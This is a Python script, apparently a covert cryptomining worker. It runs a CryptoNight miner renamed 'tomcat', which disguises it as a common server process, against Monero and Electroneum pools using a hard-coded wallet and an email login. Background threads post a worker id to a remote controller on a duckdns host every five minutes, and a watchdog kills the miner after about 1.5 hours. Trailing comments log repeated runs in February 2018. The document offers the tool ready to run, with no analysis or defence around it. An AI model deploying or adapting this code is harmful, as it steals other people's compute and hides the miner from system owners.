import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:08:02.208796
#2018-02-17 15:54:04.801680
#2018-02-17 17:41:06.373342
#2018-02-17 19:28:06.520213
#2018-02-17 21:19:01.271600
#2018-02-17 23:02:07.010310
#2018-02-18 00:49:03.925546
#2018-02-18 02:36:03.239714
#2018-02-18 04:23:03.426682
#2018-02-18 06:14:03.946917
#2018-02-18 08:04:01.454292
#2018-02-18 09:52:04.557828
#2018-02-18 11:39:06.330350
#2018-02-18 13:24:06.970248
#2018-02-18 15:14:01.380043
#2018-02-18 17:03:01.763697
#2018-02-18 18:49:06.165872
#2018-02-18 20:35:03.899087
#2018-02-18 22:21:01.577145
#2018-02-19 00:10:07.357040
#2018-02-19 01:57:05.175998
#2018-02-19 03:44:01.652811
#2018-02-19 05:29:01.704773
#2018-02-19 07:18:05.850456
#2018-02-19 09:07:07.084085
#2018-02-19 10:57:04.922382
#2018-02-19 12:44:08.901709
#2018-02-19 14:33:04.701865
#2018-02-19 16:20:05.562858
#2018-02-19 18:06:08.615766
#2018-02-19 19:54:06.150413
#2018-02-19 21:41:06.214149
#2018-02-19 23:27:05.438390
#2018-02-20 01:13:01.640340
#2018-02-20 03:03:05.845090
#2018-02-20 04:49:03.800709
#2018-02-20 06:33:07.731501
#2018-02-20 08:17:07.312831
#2018-02-20 10:04:05.415442
#2018-02-20 11:48:08.915111
#2018-02-20 13:36:08.753861
#2018-02-20 15:19:05.694202
#2018-02-20 17:04:07.670553
#2018-02-20 18:51:06.704279
#2018-02-20 20:42:07.050843
#2018-02-20 22:28:05.262099
#2018-02-21 00:10:06.148493
#2018-02-21 01:57:05.342195
#2018-02-21 03:45:09.927648
#2018-02-21 05:36:06.078705
#2018-02-21 07:23:15.042585
#2018-02-21 09:08:06.730496
#2018-02-21 10:56:07.366867
#2018-02-21 12:41:06.521902
#2018-02-21 14:30:12.049155
#2018-02-21 16:17:06.277040
#2018-02-21 18:06:09.546317
#2018-02-21 19:54:06.251087
#2018-02-21 21:43:01.748015
#2018-02-21 23:29:08.943824
#2018-02-22 01:19:06.929969
#2018-02-22 03:09:07.121242
#2018-02-22 04:56:06.284476
#2018-02-22 06:41:06.820458
#2018-02-22 08:29:06.786704
#2018-02-22 10:16:01.570412
#2018-02-22 12:00:15.141836
#2018-02-22 13:46:04.565502
#2018-02-22 15:35:11.917242
#2018-02-22 17:21:01.764972
#2018-02-22 19:09:09.711108
#2018-02-22 21:02:01.263395
#2018-02-22 22:46:04.054766
#2018-02-23 00:33:04.668184
#2018-02-23 02:19:05.310333
#2018-02-23 04:08:03.716301
#2018-02-23 05:53:05.373682
#2018-02-23 07:42:02.308572
#2018-02-23 09:44:06.121656
#2018-02-23 11:51:01.488826
#2018-02-23 13:40:07.069557
#2018-02-23 15:28:01.837114
#2018-02-23 17:17:08.173597
#2018-02-23 19:01:05.982803
#2018-02-23 20:47:01.703906
#2018-02-23 22:36:03.963123
#2018-02-24 00:22:04.088451
#2018-02-24 02:14:01.534231
#2018-02-24 04:03:07.796749
#2018-02-24 05:48:06.031382
#2018-02-24 07:39:07.488039
#2018-02-24 09:24:05.118327
#2018-02-24 11:18:05.843567
#2018-02-24 13:07:07.606273
#2018-02-24 14:56:06.749549
#2018-02-24 16:46:03.663095
#2018-02-24 18:34:01.303855
#2018-02-24 20:20:08.409155
#2018-02-24 22:15:06.480675
#2018-02-25 01:24:01.447391
#2018-02-25 05:27:03.559067
#2018-02-25 11:35:01.776463